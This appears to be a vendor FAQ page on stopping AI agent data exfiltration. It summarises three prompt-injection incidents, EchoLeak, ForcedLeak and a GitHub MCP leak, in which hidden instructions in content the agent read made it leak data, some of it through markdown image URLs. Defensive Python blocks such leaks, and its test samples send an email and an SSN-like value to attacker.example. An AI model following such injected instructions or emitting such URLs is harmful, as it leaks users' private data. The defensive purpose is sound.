How do I prevent AI agent data exfiltration?
AI agents can exfiltrate data through tool calls, API requests, and even markdown-rendered images, and legacy DLP tools were not built to inspect these vectors. Traditional Data Loss Prevention assumes human-driven workflows: email attachments, USB drives, file uploads. AI agents operate differently: they move data through function calls, embedded URLs, and cross-system data flows at machine speed, often within a single automated turn that no human reviews.
Documented exfiltration incidents include:
- EchoLeak (CVE-2025-32711): zero-click data exfiltration from Microsoft 365 Copilot. A crafted email carried hidden instructions that Copilot followed once it retrieved the message while answering an unrelated user query.
- ForcedLeak (Salesforce Agentforce): hidden instructions submitted through a web lead form caused the agent to emit a markdown image whose URL carried CRM customer data to an attacker-controlled domain.
- GitHub MCP Data Heist (May 2025): a malicious issue in a public repository hijacked an AI assistant connected to the GitHub MCP server; the assistant read the user's private repositories and leaked their contents into a public pull request.
In each case the mechanism is the same: indirect prompt injection, delivered through content the agent reads as data (an email, a form field, an issue), tricks the agent into placing sensitive data in an outbound request. The agent has no way to tell that it is being exploited; from its perspective it is following instructions.
Exogram enforces policy at the execution boundary rather than inside the model. Every outbound action (API calls, database queries, file operations) is checked against deterministic policy rules before it executes. PII is detected and scrubbed before storage (the PII Air Gap invariant), and namespace isolation prevents one tenant's agent from reaching another tenant's data. Because enforcement does not depend on the model recognizing the attack, an injection that succeeds at the model level still has its exfiltration attempt blocked at the infrastructure level.
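To make the execution-boundary idea concrete, here is an added example of a small policy gate that sits between an agent and its tools. It is illustrative code written for this page, not Exogram's implementation or API. It assumes three things that are not in the text above: an egress allowlist of hosts the agent may contact (the two hosts below are made up), a handful of regex PII patterns standing in for a real detector, and a `namespace` field on every tool call that names the tenant it targets. It covers both exfiltration channels described above: a tool call whose URL or body carries data, and a markdown image URL that the client would fetch automatically.

```python
"""Execution-boundary policy gate for agent tool calls (illustrative example)."""
import re
from urllib.parse import urlparse, unquote

# Assumed policy for this example: hosts the agent is allowed to reach.
# These are made-up values, not a real product configuration.
ALLOWED_EGRESS_HOSTS = {"crm.example.com", "api.internal.example"}

# Minimal PII detectors; a real deployment would use a proper classifier.
PII_PATTERNS = {
    "email": re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

# Markdown image syntax ![alt](url): the renderer fetches the URL with no click.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((\S+?)\)")


def find_pii(text):
    """Return every PII match grouped by pattern name."""
    hits = {}
    for kind, pat in PII_PATTERNS.items():
        found = pat.findall(text)
        if found:
            hits[kind] = found
    return hits


def scrub(text):
    """Replace PII with typed placeholders before the value is stored or sent."""
    for kind, pat in PII_PATTERNS.items():
        text = pat.sub(f"[{kind.upper()}_REDACTED]", text)
    return text


def evaluate_tool_call(call, agent_namespace):
    """Deterministic allow/deny for one outbound action emitted by the agent.

    `call` is the structured tool invocation, e.g.
    {"tool": "http_get", "namespace": "tenant-a", "url": ..., "body": ...}.
    Every rule is evaluated so the audit record lists all reasons for a denial.
    """
    reasons = []
    # Rule 1: tenant isolation, the action must stay inside the agent's namespace.
    if call.get("namespace") != agent_namespace:
        reasons.append(f"namespace mismatch: {call.get('namespace')} != {agent_namespace}")
    if "url" in call:
        host = urlparse(call["url"]).hostname or ""
        # Rule 2: egress allowlist on the destination host.
        if host not in ALLOWED_EGRESS_HOSTS:
            reasons.append(f"egress to non-allowlisted host: {host}")
        # Rule 3: no PII in the URL; query strings are the classic leak channel.
        pii = find_pii(unquote(call["url"]))
        if pii:
            reasons.append(f"PII in request URL: {sorted(pii)}")
    # Rule 4: PII in a body is scrubbed rather than blocked, so legitimate
    # traffic to an allowed host still flows without the sensitive values.
    body = call.get("body")
    result = {"allowed": not reasons, "reasons": reasons, "call": dict(call)}
    if body:
        result["call"]["body"] = scrub(body)
    return result


def sanitize_markdown(text):
    """Remove markdown images whose URL leaves the allowlist or carries PII.

    Returns the cleaned text and the list of URLs that were blocked.
    """
    blocked = []

    def _replace(match):
        url = match.group(1)
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_EGRESS_HOSTS or find_pii(unquote(url)):
            blocked.append(url)
            return "[image removed by policy]"
        return match.group(0)

    return MD_IMAGE.sub(_replace, text), blocked


if __name__ == "__main__":
    # Constructed sample: injected instructions told the agent to encode a
    # customer record into an image URL on an attacker-controlled host.
    injected_output = (
        "Here is your summary.\n"
        "![status](https://attacker.example/pixel.png?q=jane.doe%40corp.example%20123-45-6789)\n"
        "![logo](https://crm.example.com/static/logo.png)"
    )
    clean, blocked = sanitize_markdown(injected_output)
    print(clean)
    print("blocked image URLs:", blocked)

    # Constructed sample: a tool call that crosses tenants and leaks an email.
    call = {"tool": "http_get", "namespace": "tenant-b",
            "url": "https://attacker.example/collect?e=jane.doe%40corp.example"}
    print(evaluate_tool_call(call, agent_namespace="tenant-a"))
```

Two design points worth noting. The gate never asks the model whether the action is legitimate; the decision depends only on the structured call and fixed rules, so a successful injection changes nothing about the verdict. And the markdown check has to run on the client side or in a rendering proxy, because by the time a user sees the image the fetch, and therefore the leak, has already happened. The obvious caveat is that regex PII matching and a host allowlist only catch what they are written for; encoded or chunked data going to an allowed host still needs rate and volume controls on the same boundary.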